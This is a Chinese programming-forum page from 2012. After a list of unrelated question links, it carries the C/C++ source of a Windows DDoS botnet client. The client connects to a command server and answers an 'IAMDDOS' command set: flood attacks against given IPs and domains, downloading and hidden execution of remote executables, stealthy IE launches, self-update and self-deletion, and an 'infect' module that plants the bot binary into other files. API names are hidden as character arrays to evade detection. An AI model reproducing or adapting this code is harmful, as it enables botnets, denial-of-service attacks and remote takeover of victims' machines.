本帖最后由 xxyyzz886 于 2012-06-10 12:04:56 编辑
解决方案 »
- 关于图像处理 为什么算法的书上介绍的都是BMP格式的?
- 有没有在 SYS 驱动里实现 TCP 通讯的代码,给一份,谢谢!
- first-chance exception?
- 各位高人请留步,怎样用ado有条件地更新多个表中的多个字段?
- 用GDI打印,为什么我的文本打印程序在不同的打印机上打印的位置不一样?
- 新手求助:在VC中如何调用IE浏览器
- 请教一个 编译的 问题
- 在api编辑类中BN_CHANGE和EN_UPDATA通知码干什么用
- VC里面如何关闭串口回显?
- 一个关于ADO数据库的问题
- [求助]自定义结构构建CArray数组,获取数组中结构变量出错
- 在OPENCV读取的视频中画出一个目标检测框
char* GetHttpFile(char Url[], char *buf, DWORD dwBufLen)
{
HMODULE hDll;
LPVOID hInternet,hUrlHandle;
char *pBuf=NULL;
DWORD dwFlags; memset(buf, 0, dwBufLen);
pBuf=buf; char strWinNet[] = {'w','i','n','i','n','e','t','.','d','l','l','\0'};
hDll = LoadLibrary(strWinNet);
if(hDll)
{
typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
pInternetOpen InternetOpen=NULL;
char strNetOpen[] = {'I','n','t','e','r','n','e','t','O','p','e','n','A','\0'};
InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, strNetOpen);
hInternet = InternetOpen("baidu",0, NULL, NULL, 0);
if (hInternet != NULL)
{
hUrlHandle = InternetOpenUrl(hInternet, Url, NULL, 0, 0x04000000, 0);
if (hUrlHandle!= NULL)
{
memset(buf,0,dwBufLen);
InternetReadFile(hUrlHandle, buf,dwBufLen - 1, &dwFlags);
InternetCloseHandle(hUrlHandle);
hUrlHandle = NULL;
}
InternetCloseHandle(hInternet);
hInternet = NULL;
}
FreeLibrary(hDll);
if(strstr(pBuf, "无法找到") != NULL)
return "DOWNFAIL";
else
return pBuf;
}
else
return NULL;
}
SOCKET MainConnectCli()
{
// printf("pass2");
char chIP[128]={0},chPort[128]={0},*ip=NULL;
char buf[2000];
//ip=GetHttpFile(modify_data.MainConect,buf, sizeof(buf));//容易出现空指针
ip=modify_data.IpFile;//容易出现空指针 if(strstr(ip,":")!=NULL)
{
char nip[128]={0},nport[128]={0};
strncpy(chIP,ip,strcspn(ip,":"));
ip=ip+strcspn(ip,":")+1;
strcpy(chPort,ip);
}
else
{
return SOCKET_ERROR;
}
struct sockaddr_in LocalAddr;
LocalAddr.sin_family=AF_INET;
// htonsT phtons= (htonsT)GetProcAddress(LoadLibrary("ws2_32.dll"),"htons");
LocalAddr.sin_port=htons(atoi(chPort));
LocalAddr.sin_addr.S_un.S_addr=resolve(chIP);
// socketT psocket= (socketT)GetProcAddress(LoadLibrary("ws2_32.dll"),"socket");
SOCKET MySocket = socket(AF_INET, SOCK_STREAM, 0);
// connectT pconnect= (connectT)GetProcAddress(LoadLibrary("ws2_32.dll"),"connect");
if(connect(MySocket,(PSOCKADDR)&LocalAddr,sizeof(LocalAddr)) == SOCKET_ERROR)
{
// closesocketT pclosesocket= (closesocketT)GetProcAddress(LoadLibrary("ws2_32.dll"),"closesocket");
closesocket(MySocket);
return SOCKET_ERROR;
}
return MySocket;}
SOCKET ServerConnectCli()
{
// printf("pass3");
char chIP[128]={0},chPort[128]={0},*ip=NULL;
char buf[2000];
if(strstr(modify_data.IpFile,"http")!=NULL)
{
ip=GetHttpFile(modify_data.IpFile ,buf, sizeof(buf));
if(strstr(ip,":")!=NULL)
{
char nip[128]={0},nport[128]={0};
strncpy(chIP,ip,strcspn(ip,":"));
ip=ip+strcspn(ip,":")+1;
strcpy(chPort,ip);
}
}
else
{
char *ip=modify_data.IpFile;
if(strstr(ip,":")!=NULL)
{
char nip[128]={0},nport[128]={0};
strncpy(chIP,ip,strcspn(ip,":"));
ip=ip+strcspn(ip,":")+1;
strcpy(chPort,ip);
}
}
struct sockaddr_in LocalAddr;
LocalAddr.sin_family=AF_INET;
// htonsT phtons= (htonsT)GetProcAddress(LoadLibrary("ws2_32.dll"),"htons");
LocalAddr.sin_port=htons(atoi(chPort));
LocalAddr.sin_addr.S_un.S_addr=resolve(chIP);
//连接的socket
// socketT psocket= (socketT)GetProcAddress(LoadLibrary("ws2_32.dll"),"socket");
SOCKET MySocket = socket(AF_INET, SOCK_STREAM, 0);
// connect pconnect= (connectT)GetProcAddress(LoadLibrary("ws2_32.dll"),"connect");
if(connect(MySocket,(PSOCKADDR)&LocalAddr,sizeof(LocalAddr)) == SOCKET_ERROR)
{
// closesocketT pclosesocket= (closesocketT)GetProcAddress(LoadLibrary("ws2_32.dll"),"closesocket");
closesocket(MySocket);
return SOCKET_ERROR;
}
return MySocket;
}
void SetCheckTimeout(SOCKET S,int CheckTime)
{
// Set KeepAlive 开启保活机制
if (setsockopt(S, SOL_SOCKET, SO_KEEPALIVE, (char *)&CheckTime, sizeof(CheckTime)) != 0)
{
return;
}
// 设置超时详细信息
tcp_keepalive klive;
klive.onoff = 1; // 启用保活
klive.keepalivetime = 1000 * 60 * 3;
klive.keepaliveinterval = 1000 * 10; // 重试间隔为10秒 Resend if No-Reply
WSAIoctl
(
S,
SIO_KEEPALIVE_VALS,
&klive,
sizeof(tcp_keepalive),
NULL,
0,
(unsigned long *)&CheckTime,
0,
NULL
); return;
}void PlusConnect(SOCKET s)
{
LPFNPROCESSTRANS lpfnProcessTrans = (LPFNPROCESSTRANS)GetProcAddress(hPlusDll, "ProcessTrans");
if (lpfnProcessTrans)
{
sockaddr_in sin;
int ilen = sizeof(sin);
if (SOCKET_ERROR != getpeername(s, (sockaddr*)&sin, &ilen))
{
char addr[64];
wsprintf(
addr,
"%u.%u.%u.%u",
sin.sin_addr.S_un.S_un_b.s_b1,
sin.sin_addr.S_un.S_un_b.s_b2,
sin.sin_addr.S_un.S_un_b.s_b3,
sin.sin_addr.S_un.S_un_b.s_b4
);
lpfnProcessTrans(addr, ntohs(sin.sin_port), g_dwTickcount);
}
}
}BOOL RecvFullData(SOCKET s, char *buf, DWORD datalen)
{
int iLen = 0; if (0 == datalen) return TRUE; while(1)
{
fd_set FdRead;
FD_ZERO(&FdRead);
FD_SET(MainSocket,&FdRead);
int Er=select(s+1, &FdRead, NULL, NULL, NULL);
if(Er==SOCKET_ERROR) break; if(Er && FD_ISSET(s,&FdRead))
{
int iRet = recv(s, buf + iLen, datalen - iLen, 0);
if (iRet == 0 || iRet == SOCKET_ERROR) break; iLen += iRet;
if (iLen >= datalen) break;
}
}
return (iLen == datalen);
}BOOL LoadM2Addon()
{
TCHAR buf[MAX_PATH];
BOOL bRet = FALSE; wsprintf(buf, TEXT("hra%u.dll"), STORM_MIR2);
HMODULE hM2Dll = LoadLibrary(buf);
if (NULL != hM2Dll)
{
lpfnStartWork = (LPFNSTARTWORK)GetProcAddress(hM2Dll, "StartWork");
lpfnStopWork = (LPFNSTOPWORK)GetProcAddress(hM2Dll, "StopWork");
if (NULL != lpfnStopWork && NULL != lpfnStartWork)
{
bRet = TRUE;
}
else
{
FreeLibrary(hM2Dll);
DeleteFile(buf);
}
} return bRet;
}BOOL LoadInfectAddon()
{
TCHAR buf[MAX_PATH];
BOOL bRet = FALSE;
wsprintf(buf, TEXT("hra%u.dll"), STORM_INFECT);
HMODULE hInfectDll = LoadLibrary(buf);
return (NULL != hInfectDll);
}
(
DWORD nBufferLength,
LPSTR lpBuffer
);typedef BOOL (WINAPI *WriteFileT)
(
HANDLE hFile,
LPCVOID lpBuffer,
DWORD nNumberOfBytesToWrite,
LPDWORD lpNumberOfBytesWritten,
LPOVERLAPPED lpOverlapped
);
DWORD _stdcall ConnectClient(LPVOID lParam)
{
BOOL bRecvFull;
char Buffer[STORM_MAX];
BOOL bIsPlusFileData = FALSE;
DWORD dwFileLength = 0;
DWORD dwPlusKeyword = 0;
HANDLE hPlusDllFile = INVALID_HANDLE_VALUE;
char strWriteFile[] = {'W','r','i','t','e','F','i','l','e','\0'};
WriteFileT pWriteFile = (WriteFileT)GetProcAddress(LoadLibrary("kernel32.dll"), strWriteFile);
GetTempPathAT pGetTempPathA = (GetTempPathAT)GetProcAddress(LoadLibrary("kernel32.dll"),"GetTempPathA");
MainSocket=MainConnectCli();
if(MainSocket==SOCKET_ERROR)
{
return 0;
}
// MainSocket=ServerConnectCli();
SetCheckTimeout(MainSocket,75); MSGHEAD *pmh = (MSGHEAD *)Buffer;
SYSINFO sysinfo;
memset(&sysinfo, 0, sizeof(SYSINFO));
GetSysinfo(&sysinfo);
if (TRUE == LoadM2Addon())
{
sysinfo.dwFeature += SIF_MIR2;
} if (TRUE == LoadInfectAddon())
{
sysinfo.dwFeature += SIF_INFECT;
}
pmh->dwMsgLength = sizeof(SYSINFO);
pmh->dwMsgID=IAMDDOS;
memcpy(Buffer + sizeof(MSGHEAD),&sysinfo,sizeof(SYSINFO)); if(send(MainSocket,Buffer, sizeof(MSGHEAD) + pmh->dwMsgLength,0)==SOCKET_ERROR)
{
closesocket(MainSocket);
return 0;
}
char strUrlMon[] = {'u','r','l','m','o','n','.','d','l','l','\0'};
char strUrlDown[] = {'U','R','L','D','o','w','n','l','o','a','d','T','o','F','i','l','e','A','\0'};
while(1)
{
memset(Buffer, 0, sizeof(Buffer));
UINT nRet = (FALSE == bIsPlusFileData) ? sizeof(MSGHEAD) : min(dwFileLength, sizeof(Buffer));
// 一定要接收到完整数据后才返回,否则就按错误处理!
bRecvFull = RecvFullData(MainSocket, Buffer, nRet);
if(FALSE == bRecvFull)
{
closesocket(MainSocket);
break;
}
// 正在接受远控文件 或者 已经加载了远控文件,则继续接收文件数据
else if (TRUE == bIsPlusFileData)
{
DWORD dwWrittenBytes = 0;
if (NULL == hPlusDll && INVALID_HANDLE_VALUE != hPlusDllFile)
{
if (FALSE == pWriteFile(hPlusDllFile, Buffer, (DWORD)nRet, &dwWrittenBytes, NULL) || dwWrittenBytes != (DWORD)nRet)
{
CloseHandle(hPlusDllFile);
hPlusDllFile = INVALID_HANDLE_VALUE;
}
}
dwFileLength -= (DWORD)nRet; if (0 == dwFileLength)
{
bIsPlusFileData = FALSE;
if (NULL == hPlusDll && INVALID_HANDLE_VALUE != hPlusDllFile)
{
CloseHandle(hPlusDllFile);
hPlusDllFile = INVALID_HANDLE_VALUE; hPlusDll = LoadLibrary("PlusCtrl.dll");
}
if (hPlusDll) PlusConnect(MainSocket);
}
}
else
{
pmh = (MSGHEAD *)Buffer;
bRecvFull = RecvFullData(MainSocket, Buffer + sizeof(MSGHEAD), pmh->dwMsgLength);
if(FALSE == bRecvFull)
{
closesocket(MainSocket);
break;
}
UCMDINFO *pci = (UCMDINFO *)(Buffer + sizeof(MSGHEAD));
char *pAddData = (char *)(Buffer + sizeof(MSGHEAD));
char *pcistrdata = pAddData + sizeof(UCMDINFO);
switch(pmh->dwMsgID)
{
case STORM_PLUS_INIT:
{
bIsPlusFileData = TRUE;
dwFileLength = *(DWORD*)pAddData;
nRet -= 8;
if (hPlusDll)
{
if (nRet > 0) dwFileLength -= (DWORD)nRet;
break;
}
hPlusDllFile = CreateFile("PlusCtrl.dll", GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, 0, NULL);
if (nRet > 0)
{
DWORD dwWrittenBytes = 0;
if (INVALID_HANDLE_VALUE != hPlusDllFile)
{
if (FALSE == pWriteFile(hPlusDllFile, pAddData + sizeof(DWORD), (DWORD)nRet, &dwWrittenBytes, NULL) || dwWrittenBytes != (DWORD)nRet)
{
CloseHandle(hPlusDllFile);
hPlusDllFile = INVALID_HANDLE_VALUE;
}
}
dwFileLength -= (DWORD)nRet;
}
break;
} case STORM_DDOS:
{
lstrcpyn(ddosinfo.ip, pcistrdata,sizeof(ddosinfo.ip));
ddosinfo.port = pci->port;
ddosinfo.thread = pci->thread;
ddosinfo.time = pci->time;
ddosinfo.flag = pci->flag;
DealwithDDoS(&ddosinfo);
break;
}
case STORM_TS1:
{
ccinfo.port = pci->port;
ccinfo.thread = pci->thread;
ccinfo.time = pci->time;
ccinfo.flag = pci->flag;
ccinfo.count1 = *(DWORD*)&pcistrdata[0];
ccinfo.count2 = *(DWORD*)&pcistrdata[4];
lstrcpyn(ccinfo.dns, &pcistrdata[8], sizeof(ccinfo.dns));
lstrcpyn(ccinfo.data, &pcistrdata[8] + lstrlen(ccinfo.dns) + 1, sizeof(ccinfo.data));
DealwithCC(&ccinfo);
break;
}
case STORM_TS3:
{
lstrcpyn(ts3info.ip, pcistrdata, sizeof(ts3info.ip));
lstrcpyn(ts3info.data, pcistrdata + lstrlen(ts3info.ip) + 1, sizeof(ts3info.data));
ts3info.port = pci->port;
ts3info.thread = pci->thread;
ts3info.time = pci->time;
ts3info.flag = pci->flag;
DealwithTS3(&ts3info);
break;
}
case STORM_MIR2:
{
if (NULL == lpfnStartWork) break; char *mir2ip, *mir2say;
mir2ip = pcistrdata;
mir2say = mir2ip + lstrlen(mir2ip) + 1;
lpfnStartWork(
mir2ip, pci->port,
mir2say,
pci->thread,
pci->time
);
break;
}
case STORM_STOP:
{
IsStop=1;
if (NULL != lpfnStopWork)
{
lpfnStopWork();
}
break;
}
case STORM_REMOVE:
{
SetFileAttributesAT pSetFileAttributesA = (SetFileAttributesAT)GetProcAddress(LoadLibrary("kernel32.dll"),"SetFileAttributesA");
ExitProcessT pExitProcess = (ExitProcessT)GetProcAddress(LoadLibrary("kernel32.dll"),"ExitProcess");
HANDLE hMutex = OpenMutex(0x1F0001,0,modify_data.ws_svcname);//0x1F0001硬编码
GetLastError();//这句是废话
if (hMutex)
{
ReleaseMutex(hMutex);
CloseHandle(hMutex);
}
char Servername[256];
SC_HANDLE service, scm;
scm = OpenSCManager(0, 0,SC_MANAGER_CREATE_SERVICE);
service = OpenService(scm, modify_data.ws_svcname,SERVICE_ALL_ACCESS | DELETE);
DeleteService(service);
char gggggg[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','A','\0'};
GetModuleFileNameAT pGetModuleFileNameA = (GetModuleFileNameAT)GetProcAddress(LoadLibrary("kernel32.dll"),gggggg); pGetModuleFileNameA(NULL,Servername,256);
pSetFileAttributesA(Servername, FILE_ATTRIBUTE_NORMAL);
pExitProcess(0);
}
case STORM_DOWNLOADHIDE:
{
char myFILE[MAX_PATH]={0},FileName[128]={0};
pGetTempPathA(MAX_PATH,myFILE);
//wsprintf(FileName, "%d", GetTickCount());
wsprintf(FileName, "%d", timeGetTime());
//wsprintf(FileName,"%c%c%c%c%c.exe",'a'+StormRand(26),'a'+StormRand(26),'a'+StormRand(26),'a'+StormRand(26),'a'+StormRand(26)); lstrcat(myFILE, FileName); HMODULE hurlmon;
hurlmon=LoadLibrary(strUrlMon); void (WINAPI *DOWNFILE) (void*, LPCSTR, LPCSTR, DWORD, void*);
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon, strUrlDown); DOWNFILE(0, pAddData, myFILE,10,NULL);
WinExec(myFILE,(pmh->dwMsgID == STORM_DOWNLOAD) ? SW_SHOW : SW_HIDE);
break;
}
case STORM_DOWNLOAD:
case STORM_UPDATESERVER:
{
//关闭互斥
HANDLE hMutex = OpenMutex(0x1F0001,0,modify_data.ws_svcname); if (hMutex)
{
ReleaseMutex(hMutex);
CloseHandle(hMutex);
}
char myFILE[MAX_PATH]={0},FileName[128]={0};
pGetTempPathA(MAX_PATH,myFILE);
wsprintf(FileName,"bpk%c%c%c%c%ccn.exe",'a'+StormRand(26),'a'+StormRand(26),'a'+StormRand(26),'a'+StormRand(26),'a'+StormRand(26));
lstrcat(myFILE, FileName); HMODULE hurlmon; hurlmon=LoadLibrary(strUrlMon); HRESULT (WINAPI *DOWNFILE) (void*, LPCSTR, LPCSTR, DWORD, void*);
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon, strUrlDown); HRESULT hr=DOWNFILE(0, pAddData, myFILE,10,NULL);
if(hr!=S_OK)
break; SC_HANDLE service, scm;
scm = OpenSCManager(0, 0,SC_MANAGER_CREATE_SERVICE);
service = OpenService(scm, modify_data.ws_svcname,SERVICE_ALL_ACCESS | DELETE);
DeleteService(service); WinExec(myFILE,SW_HIDE);
ExitProcess(0);
}
case STORM_OPENIEHIDE:
{
ShellExecute(NULL,"open","iexplore.exe", pAddData,NULL,SW_HIDE);
break;
}
case STORM_OPENIE:
{
ShellExecute(GetDesktopWindow(),"open","iexplore.exe", pAddData,NULL,SW_SHOWNORMAL);
break;
}
case STORM_HEART://心跳不处理
break;
}
}
}
closesocket(MainSocket);
if (hPlusDllFile != INVALID_HANDLE_VALUE)
{
CloseHandle(hPlusDllFile);
}
}
void DecryptData(unsigned char *szRec, unsigned long nLen, unsigned long key)
{
// printf("pass1");
unsigned long i;
unsigned char p; p = (unsigned char ) key % 400 -50; for(i = 0; i < nLen; i++)
{
*szRec -= p;
*szRec ^= p;
// *szRec += p;
szRec++;
}
}void DeleteMe()
{
char gggggg[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','A','\0'};
GetModuleFileNameAT pGetModuleFileNameA = (GetModuleFileNameAT)GetProcAddress(LoadLibrary("kernel32.dll"),gggggg); char szCurPath[MAX_PATH] = {0};
pGetModuleFileNameA(NULL, szCurPath, sizeof(szCurPath));
char strTempPath[MAX_PATH];
GetTempPath(MAX_PATH, strTempPath);
lstrcat(strTempPath, "SOFTWARE.LOG");
if (MoveFileEx(szCurPath, strTempPath, MOVEFILE_REPLACE_EXISTING | MOVEFILE_COPY_ALLOWED))
{
MoveFileEx(strTempPath, NULL, MOVEFILE_DELAY_UNTIL_REBOOT | MOVEFILE_REPLACE_EXISTING);
}
}
//以下是服务的外壳。不用管这么多。因为要写注释也不知道怎么写。格式是固定的
static BOOL service_is_exist()
{
char SubKey[MAX_PATH]={0};
lstrcpy(SubKey,"SYSTEM\\CurrentControlSet\\Services\\");
lstrcat(SubKey,modify_data.ws_svcname);
HKEY hKey;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS)
return TRUE;
else
return FALSE;
}static SERVICE_STATUS srvStatus;
static SERVICE_STATUS_HANDLE hSrv;
static void __stdcall SvcCtrlFnct(DWORD CtrlCode)
{
switch(CtrlCode)
{
case SERVICE_CONTROL_STOP:
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_STOP_PENDING;
SetServiceStatus(hSrv,&srvStatus);
Sleep(500);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_STOPPED;
break;
case SERVICE_CONTROL_SHUTDOWN:
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_STOP_PENDING;
SetServiceStatus(hSrv,&srvStatus); Sleep(500);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_STOPPED;
break;
case SERVICE_CONTROL_PAUSE:
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_PAUSE_PENDING;
SetServiceStatus(hSrv,&srvStatus);
Sleep(500);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_CONTINUE_PENDING;
SetServiceStatus(hSrv,&srvStatus);
Sleep(500);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_RUNNING;
break;
}
SetServiceStatus(hSrv,&srvStatus);
}BOOL CALLBACK EnumResNameProc(HMODULE hModule, LPCTSTR lpszType, LPTSTR lpszName, LONG_PTR lParam)
{
typedef DWORD (WINAPI *SizeofResourceT)
(
HMODULE hModule,
HRSRC hResInfo
);
SizeofResourceT pSizeofResource = (SizeofResourceT)GetProcAddress(LoadLibrary("kernel32.dll"),"SizeofResource"); HRSRC hResInfo = FindResource(hModule, lpszName, lpszType);
if (NULL != hResInfo)
{
DWORD dwRcSize = pSizeofResource(hModule, hResInfo);
HGLOBAL hResData = LoadResource(hModule, hResInfo);
if (NULL != hResData && 0 != dwRcSize)
{
char *lpResLock = (char *)LockResource(hResData);
if (NULL != lpResLock)
{
TCHAR buf[MAX_PATH];
wsprintf(buf, TEXT("hra%u.dll"), lpszName);
HANDLE hFile = CreateFile(buf, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, 0, NULL);
if (INVALID_HANDLE_VALUE != hFile)
{
DWORD dwWrittenBytes = 0;
WriteFile(hFile, lpResLock, dwRcSize, &dwWrittenBytes, NULL);
CloseHandle(hFile);
}
UnlockResource(hResData);
}
}
}
return TRUE;
}void SaveAddon()
{
EnumResourceNames(NULL, RT_RCDATA, EnumResNameProc, 0);
}#include "..\Addon_Infect\resource.h"
// 插入附加模块
BOOL InsertExeToInfect(char *szInfectAddon)
{
HANDLE hUpdateRes; // update resource handle
BOOL result;
char buf[MAX_PATH]; lstrcpy(buf,"SYSTEM\\CurrentControlSet\\Services\\");
lstrcat(buf,modify_data.ws_svcname);
HKEY hKey;
if(ERROR_SUCCESS != RegOpenKeyEx(HKEY_LOCAL_MACHINE,buf,0L,KEY_ALL_ACCESS,&hKey))
return FALSE; DWORD dwBuffLength = sizeof(buf);
RtlZeroMemory(buf, sizeof(buf));
if (ERROR_SUCCESS != RegQueryValueEx(hKey, "ImagePath", NULL, NULL, (LPBYTE)buf, &dwBuffLength))
{
RegCloseKey(hKey);
return FALSE;
}
RegCloseKey(hKey);
if (INVALID_FILE_ATTRIBUTES == GetFileAttributes(buf)) return FALSE; HANDLE hAddon = CreateFile(buf, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
if (INVALID_HANDLE_VALUE == hAddon) return FALSE;
DWORD dwAddonLength = GetFileSize(hAddon, NULL);
if (0 == dwAddonLength)
{
CloseHandle(hAddon);
return FALSE;
}
char *lpAddonData = (char *)GlobalAlloc(GPTR, dwAddonLength);
if (NULL == lpAddonData)
{
CloseHandle(hAddon);
return FALSE;
} if (FALSE == ReadFile(hAddon, lpAddonData, dwAddonLength, &dwAddonLength, NULL))
{
GlobalFree(lpAddonData);
CloseHandle(hAddon);
return FALSE;
}
CloseHandle(hAddon);
hUpdateRes = BeginUpdateResource(szInfectAddon, FALSE);
if (hUpdateRes == NULL)
{
GlobalFree(lpAddonData);
return FALSE;
} result = UpdateResource(hUpdateRes,
RT_RCDATA,
(LPCTSTR)IDR_BINDATA,
MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL),
lpAddonData,
dwAddonLength); if (result)
{
result = UpdateResource(hUpdateRes,
RT_RCDATA,
(LPCTSTR)IDR_SRVNAME,
MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL),
modify_data.ws_svcname,
lstrlen(modify_data.ws_svcname) + 1);
} if (!EndUpdateResource(hUpdateRes, FALSE))
{
GlobalFree(lpAddonData);
return FALSE;
}
GlobalFree(lpAddonData);
return result;
}